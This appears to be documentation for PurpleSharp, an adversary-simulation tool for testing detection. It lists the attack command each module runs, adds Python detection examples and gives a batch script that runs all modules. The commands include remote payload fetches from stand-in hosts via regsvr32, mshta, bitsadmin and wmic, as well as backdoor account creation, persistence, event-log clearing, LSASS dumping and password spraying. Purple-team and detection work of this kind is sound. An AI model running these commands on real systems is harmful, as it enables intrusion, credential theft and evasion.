PurpleSharp

Command and Scripting Interpreter: PowerShell
.\PurpleSharp_x64.exe /t T1059.001

Variation 1
This module uses the Win32 API CreateProcess to execute a specific command:
powershell -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
Variation 2
This module uses the System.Management.Automation .NET namespace to execute the same script in-process. No powershell.exe is spawned, so there is no process-creation event with a -enc command line to alert on; PowerShell script block logging (Event ID 4104) is the telemetry that still captures it.
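The -enc argument in Variation 1 is base64 over the UTF-16LE bytes of the script, which is why a plain base64 decoder shows every other byte as NUL. The following is an added example (not PurpleSharp code) of how a detection pipeline can recover the script from a captured process command line; it also accepts the abbreviated flag spellings powershell.exe allows (-e, -ec, -enc, ...). The sample command line is the one this module launches; the flag and function names are this example's own.

```python
import base64
import binascii
import re
from typing import Optional

# Constructed sample: the command line PurpleSharp's T1059.001 Variation 1 launches, as
# it would appear in a Sysmon Event ID 1 / Security 4688 CommandLine field.
SAMPLE_COMMAND_LINE = "powershell -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA=="

# A "-flag value" pair; powershell.exe also accepts "/flag".
_FLAG_VALUE = re.compile(r"(?<!\S)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")


def _is_encoded_command_flag(flag: str) -> bool:
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc,
    # -encodedcommand, ...), so matching the literal "-enc" alone misses real variants.
    f = flag.lower()
    return f.startswith("e") and "encodedcommand".startswith(f)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the script hidden behind a PowerShell -EncodedCommand argument, or None."""
    for flag, blob in _FLAG_VALUE.findall(command_line):
        if not _is_encoded_command_flag(flag):
            continue
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue  # not base64; try the next candidate pair
        try:
            # PowerShell base64-encodes the UTF-16LE bytes of the script, not UTF-8.
            return raw.decode("utf-16-le")
        except UnicodeDecodeError:
            continue
    return None


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_COMMAND_LINE))
```

Run against the module's command line this returns the innocuous Start-Sleep -s 20, which is what you should see decoded in your SIEM when the simulation fires; a rule that only string-matches "-enc" will not fire on the -e or -ec spellings that this decoder handles.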

Command and Scripting Interpreter: Windows Command Shell
.\PurpleSharp_x64.exe /t T1059.003

This module uses the Win32 API CreateProcess to execute a specific command:
cmd.exe /C whoami
Command and Scripting Interpreter: Visual Basic
.\PurpleSharp_x64.exe /t T1059.005

This module uses the Win32 API CreateProcess to execute a specific command:
wscript.exe invoice0420.vbs
Command and Scripting Interpreter: JavaScript/JScript
.\PurpleSharp_x64.exe /t T1059.007

This module uses the Win32 API CreateProcess to execute a specific command:
wscript.exe invoice0420.js
System Services: Service Execution
.\PurpleSharp_x64.exe /t T1569.002

This module uses the Win32 API CreateProcess to execute a specific command:
net start UpdaterService
Scheduled Task/Job: Scheduled Task
.\PurpleSharp_x64.exe /t T1053.005

This module uses the Win32 API CreateProcess to execute a specific command:
SCHTASKS /CREATE /SC DAILY /TN BadScheduledTask /TR "C:\Windows\Temp\xyz12345.exe" /ST 13:00
Create Account: Local Account
.\PurpleSharp_x64.exe /t T1136.001

Variation 1
This module uses the Win32 API NetUserAdd to create a local account.
Variation 2
This module uses the Win32 API CreateProcess to execute a specific command:
net user hax0r Passw0rd123El7 /add
Create or Modify System Process: Windows Service
.\PurpleSharp_x64.exe /t T1543.003

Variation 1
This module uses the Win32 API CreateService to create a Windows Service.
Variation 2
This module uses the Win32 API CreateProcess to execute a specific command:
sc create UpdaterService binpath= C:\Windows\Temp\superlegit.exe type= own start= auto
Boot or Logon Autostart Execution: Registry Run Keys
.\PurpleSharp_x64.exe /t T1547.001

Variation 1
This module uses the Microsoft.Win32 .NET namespace to write a value under the Run registry key.
Variation 2
This module uses the Win32 API CreateProcess to execute a specific command:
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V BadApp /t REG_SZ /F /D C:\Windows\Temp\xyz12345.exe
Event Triggered Execution: Windows Management Instrumentation Event Subscription
.\PurpleSharp_x64.exe /t T1546.003

This module uses the System.Management .NET namespace to create the main pieces of a WMI Event Subscription: an Event Filter, an Event Consumer and a FilterToConsumerBinding.
Signed Binary Proxy Execution: Regsvr32
.\PurpleSharp_x64.exe /t T1218.010

This module uses the CreateProcess Win32 API to execute
regsvr32.exe /u /n /s /i:http://malicious.domain:8080/payload.sct scrobj.dll
Signed Binary Proxy Execution: Regsvcs/Regasm
.\PurpleSharp_x64.exe /t T1218.009

This module uses the CreateProcess Win32 API to execute
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U winword.dll
Signed Binary Proxy Execution: InstallUtil
.\PurpleSharp_x64.exe /t T1218.004

This module uses the CreateProcess Win32 API to execute
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Temp\XKNqbpzl.exe
Deobfuscate/Decode Files or Information
.\PurpleSharp_x64.exe /t T1140

This module uses the CreateProcess Win32 API to execute
certutil.exe -decode encodedb64.txt decoded.exe
Signed Binary Proxy Execution: Mshta
.\PurpleSharp_x64.exe /t T1218.005

This module uses the CreateProcess Win32 API to execute
mshta.exe http://webserver/payload.hta
Signed Binary Proxy Execution: CMSTP
.\PurpleSharp_x64.exe /t T1218.003

This module uses the CreateProcess Win32 API to execute
cmstp.exe /s /ns C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt
BITS Jobs
.\PurpleSharp_x64.exe /t T1197

This module uses the CreateProcess Win32 API to execute
bitsadmin.exe /transfer job /download /priority high http://web.evil/sc.exe C:\Windows\Temp\winword.exe
Signed Binary Proxy Execution: Rundll32
.\PurpleSharp_x64.exe /t T1218.011

This module uses the CreateProcess Win32 API to execute
rundll32.exe C:\Windows\twain_64.dll
Indicator Removal on Host: Clear Windows Event Logs
.\PurpleSharp_x64.exe /t T1070.001

Variation 1
This module uses the System.Diagnostics .NET namespace to delete the Security Event Log.
Variation 2
This module uses the Win32 API CreateProcess to execute a specific command:
wevtutil.exe cl Security
XSL Script Processing
.\PurpleSharp_x64.exe /t T1220

This module uses the CreateProcess Win32 API to execute
wmic.exe os get /FORMAT:"http://webserver/payload.xsl"
Process Injection: Portable Executable Injection
.\PurpleSharp_x64.exe /t T1055.002

This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread Win32 API functions to inject an innocuous shellcode.
Process Injection: Asynchronous Procedure Call
.\PurpleSharp_x64.exe /t T1055.004

This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and QueueUserAPC Win32 API functions to inject an innocuous shellcode.
Brute Force: Password Spraying
.\PurpleSharp_x64.exe /t T1110.003

Variation 1
This module uses the LogonUser Win32 API to test a single password across random users obtained via LDAP.
Variation 2
This module uses the WNetAddConnection2 Win32 API to test a single password across random users and random hosts obtained via LDAP.
Steal or Forge Kerberos Tickets: Kerberoasting
.\PurpleSharp_x64.exe /t T1558.003

This module uses the System.IdentityModel.Tokens.KerberosRequestorSecurityToken class to request Kerberos service tickets.
OS Credential Dumping: LSASS Memory
.\PurpleSharp_x64.exe /t T1003.001

This module uses the .NET Process.GetProcessesByName method to locate lsass.exe and the MiniDumpWriteDump Win32 API function (dbghelp.dll) to create a memory dump of the process.
System Network Configuration Discovery
.\PurpleSharp_x64.exe /t T1016

This module uses the CreateProcess Win32 API to execute
ipconfig.exe /all
File and Directory Discovery
.\PurpleSharp_x64.exe /t T1083

This module uses the CreateProcess Win32 API to execute the following through cmd.exe (dir and the >> redirection are cmd.exe built-ins, not a dir.exe binary):
dir c:\ >> %temp%\download
dir C:\Users >> %temp%\download
Network Share Discovery
.\PurpleSharp_x64.exe /t T1135

This module uses the NetShareEnum Win32 API function to enumerate shares on remote endpoints randomly picked using LDAP.
Network Service Scanning
.\PurpleSharp_x64.exe /t T1046

This module uses the System.Net.Sockets .NET namespace to scan ports on remote endpoints randomly picked using LDAP.
Account Discovery: Local Account
.\PurpleSharp_x64.exe /t T1087.001

This module uses the CreateProcess Win32 API to execute
net.exe user
Account Discovery: Domain Account
.\PurpleSharp_x64.exe /t T1087.002

Variation 1
This module uses the System.DirectoryServices .NET namespace to query a domain environment using LDAP.
Variation 2
This module uses the CreateProcess Win32 API to execute:
net.exe user /domain
System Service Discovery
.\PurpleSharp_x64.exe /t T1007

This module uses the CreateProcess Win32 API to execute
net.exe start
tasklist.exe /svc
System Owner/User Discovery
.\PurpleSharp_x64.exe /t T1033

This module uses the CreateProcess Win32 API to execute
whoami.exe
query user
System Network Connections Discovery
.\PurpleSharp_x64.exe /t T1049

This module uses the CreateProcess Win32 API to execute
netstat.exe
net.exe use
net.exe sessions
Remote Services: Windows Remote Management
.\PurpleSharp_x64.exe /t T1021.006
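Most of the modules above launch a recognizable command line through CreateProcess, so the quickest way to confirm that the simulations actually reached your SIEM is to replay process-creation telemetry (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled) against one rule per module. The following is an added example (not PurpleSharp code) that does exactly that: the rule patterns are derived from the commands listed above, the events are constructed samples rather than real logs, and the function names are this example's own. Variations that only call APIs (NetUserAdd, CreateService, MiniDumpWriteDump, the Microsoft.Win32 and System.Management namespaces) leave no command line and are deliberately absent from the table; they need registry, service-control, or WMI telemetry instead.

```python
import re
from typing import Dict, List, Set

# One command-line rule per CreateProcess-based module above (example rules, not
# PurpleSharp's own). Compiled case-insensitively because Windows tooling is.
RULES: Dict[str, "re.Pattern[str]"] = {
    tid: re.compile(rx, re.IGNORECASE) for tid, rx in {
        "T1059.001": r"\bpowershell(\.exe)?\b.*\s-(?:e|ec|en|enc\w*)\s+[A-Za-z0-9+/=]{16,}",
        "T1059.003": r"\bcmd(\.exe)?\s+/[ck]\b",
        "T1059.005": r"\b[wc]script(\.exe)?\b.*\.vbs\b",
        "T1059.007": r"\b[wc]script(\.exe)?\b.*\.js\b",
        "T1569.002": r"\bnet(\.exe)?\s+start\s+\w",          # net start <service>
        "T1053.005": r"\bschtasks(\.exe)?\b.*/create\b",
        "T1136.001": r"\bnet(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b",
        "T1543.003": r"\bsc(\.exe)?\s+create\b",
        "T1547.001": r"\breg(\.exe)?\s+add\b.*\\currentversion\\run\b",
        "T1218.010": r"\bregsvr32(\.exe)?\b.*(?:/i:https?://|scrobj\.dll)",
        "T1218.009": r"\b(?:regsvcs|regasm)(\.exe)?\b.*\s/u\b",
        "T1218.004": r"\binstallutil(\.exe)?\b.*\s/u\b",
        "T1140":     r"\bcertutil(\.exe)?\b.*\s-decode\b",
        "T1218.005": r"\bmshta(\.exe)?\b.*https?://",
        "T1218.003": r"\bcmstp(\.exe)?\b.*\s/ns\b",
        "T1197":     r"\bbitsadmin(\.exe)?\b.*/transfer\b",
        "T1218.011": r"\brundll32(\.exe)?\b.*\.dll",
        "T1070.001": r"\bwevtutil(\.exe)?\s+cl\s",
        "T1220":     r"\bwmic(\.exe)?\b.*/format:?\s*\"?https?://",
        "T1016":     r"\bipconfig(\.exe)?\b.*/all\b",
        "T1083":     r"(?:^|\s)dir\s+[^|>]*>>",
        "T1087.001": r"\bnet(\.exe)?\s+user\s*$",            # bare "net user"
        "T1087.002": r"\bnet(\.exe)?\s+user\s+/domain\b",
        "T1007":     r"\bnet(\.exe)?\s+start\s*$|\btasklist(\.exe)?\b.*/svc\b",
        "T1033":     r"\bwhoami(\.exe)?\b|\bquery(\.exe)?\s+user\b",
        "T1049":     r"\bnetstat(\.exe)?\b|\bnet(\.exe)?\s+(?:use|session)s?\b",
    }.items()
}

# Constructed process-creation events in the shape of Sysmon Event ID 1 fields. These
# are not real telemetry; the command lines are the ones from the module list.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /u /n /s /i:http://malicious.domain:8080/payload.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\wevtutil.exe", "CommandLine": "wevtutil.exe cl Security"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -decode encodedb64.txt decoded.exe"},
    {"Image": r"C:\Windows\System32\net.exe", "CommandLine": "net user hax0r Passw0rd123El7 /add"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /C whoami"},
    {"Image": r"C:\Windows\explorer.exe", "CommandLine": r"C:\Windows\explorer.exe"},
]


def match_techniques(command_line: str) -> Set[str]:
    """Technique IDs whose rule fires on one command line (a line can hit several)."""
    return {tid for tid, rx in RULES.items() if rx.search(command_line)}


def coverage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Which scripted techniques the telemetry shows, and which it did not capture."""
    observed: Set[str] = set()
    for event in events:
        observed |= match_techniques(event.get("CommandLine", ""))
    return {"observed": sorted(observed), "missing": sorted(set(RULES) - observed)}


if __name__ == "__main__":
    result = coverage(SAMPLE_EVENTS)
    print("observed:", ", ".join(result["observed"]))
    print("missing: ", ", ".join(result["missing"]))
```

Feed it the events your collector produced during an Audit.bat run; anything in "missing" is either a module that never executed or a telemetry gap (no command-line auditing, the Security log cleared by T1070.001 before forwarding, an agent exclusion). The rules are deliberately tied to the exact commands above and keyed on the binary name plus its telltale switch, so they are a coverage check for these simulations rather than production detection content.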

Audit.bat

Download the latest binary and run the following batch script to perform all simulations in sequence. Run it on a dedicated test host: several modules make persistent changes (a local account, a service, a scheduled task, a Run key, a WMI event subscription), and T1070.001 clears the Security event log, so confirm log forwarding is working before you start.

@echo off
ECHO "Command and Scripting Interpreter: PowerShell"
.\PurpleSharp_x64.exe /t T1059.001
timeout /t 5
ECHO "Command and Scripting Interpreter: Windows Command Shell"
.\PurpleSharp_x64.exe /t T1059.003
timeout /t 5
ECHO "Command and Scripting Interpreter: Visual Basic"
.\PurpleSharp_x64.exe /t T1059.005
timeout /t 5
ECHO "Command and Scripting Interpreter: JavaScript/JScript"
.\PurpleSharp_x64.exe /t T1059.007
timeout /t 5
ECHO "System Services: Service Execution"
.\PurpleSharp_x64.exe /t T1569.002
timeout /t 5
ECHO "Scheduled Task/Job: Scheduled Task"
.\PurpleSharp_x64.exe /t T1053.005
timeout /t 5
ECHO "Create Account: Local Account"
.\PurpleSharp_x64.exe /t T1136.001
timeout /t 5
ECHO "Create or Modify System Process: Windows Service"
.\PurpleSharp_x64.exe /t T1543.003
timeout /t 5
ECHO "Boot or Logon Autostart Execution: Registry Run Keys"
.\PurpleSharp_x64.exe /t T1547.001
timeout /t 5
ECHO "Event Triggered Execution: Windows Management Instrumentation Event Subscription"
.\PurpleSharp_x64.exe /t T1546.003
timeout /t 5
ECHO "Signed Binary Proxy Execution: Regsvr32"
.\PurpleSharp_x64.exe /t T1218.010
timeout /t 5
ECHO "Signed Binary Proxy Execution: Regsvcs/Regasm"
.\PurpleSharp_x64.exe /t T1218.009
timeout /t 5
ECHO "Signed Binary Proxy Execution: InstallUtil"
.\PurpleSharp_x64.exe /t T1218.004
timeout /t 5
ECHO "Deobfuscate/Decode Files or Information"
.\PurpleSharp_x64.exe /t T1140
timeout /t 5
ECHO "Signed Binary Proxy Execution: Mshta"
.\PurpleSharp_x64.exe /t T1218.005
timeout /t 5
ECHO "Signed Binary Proxy Execution: CMSTP"
.\PurpleSharp_x64.exe /t T1218.003
timeout /t 5
ECHO "BITS Jobs"
.\PurpleSharp_x64.exe /t T1197
timeout /t 5
ECHO "Signed Binary Proxy Execution: Rundll32"
.\PurpleSharp_x64.exe /t T1218.011
timeout /t 5
ECHO "Indicator Removal on Host: Clear Windows Event Logs"
.\PurpleSharp_x64.exe /t T1070.001
timeout /t 5
ECHO "XSL Script Processing"
.\PurpleSharp_x64.exe /t T1220
timeout /t 5
ECHO "Process Injection: Portable Executable Injection"
.\PurpleSharp_x64.exe /t T1055.002
timeout /t 5
ECHO "Process Injection: Asynchronous Procedure Call"
.\PurpleSharp_x64.exe /t T1055.004
timeout /t 5
ECHO "Brute Force: Password Spraying"
.\PurpleSharp_x64.exe /t T1110.003
timeout /t 5
ECHO "Steal or Forge Kerberos Tickets: Kerberoasting"
.\PurpleSharp_x64.exe /t T1558.003
timeout /t 5
ECHO "OS Credential Dumping: LSASS Memory"
.\PurpleSharp_x64.exe /t T1003.001
timeout /t 5
ECHO "System Network Configuration Discovery"
.\PurpleSharp_x64.exe /t T1016
timeout /t 5
ECHO "File and Directory Discovery"
.\PurpleSharp_x64.exe /t T1083
timeout /t 5
ECHO "Network Share Discovery"
.\PurpleSharp_x64.exe /t T1135
timeout /t 5
ECHO "Network Service Scanning"
.\PurpleSharp_x64.exe /t T1046
timeout /t 5
ECHO "Account Discovery: Local Account"
.\PurpleSharp_x64.exe /t T1087.001
timeout /t 5
ECHO "Account Discovery: Domain Account"
.\PurpleSharp_x64.exe /t T1087.002
timeout /t 5
ECHO "System Service Discovery"
.\PurpleSharp_x64.exe /t T1007
timeout /t 5
ECHO "System Owner/User Discovery"
.\PurpleSharp_x64.exe /t T1033
timeout /t 5
ECHO "System Network Connections Discovery"
.\PurpleSharp_x64.exe /t T1049
timeout /t 5
ECHO "Remote Services: Windows Remote Management"
.\PurpleSharp_x64.exe /t T1021.006
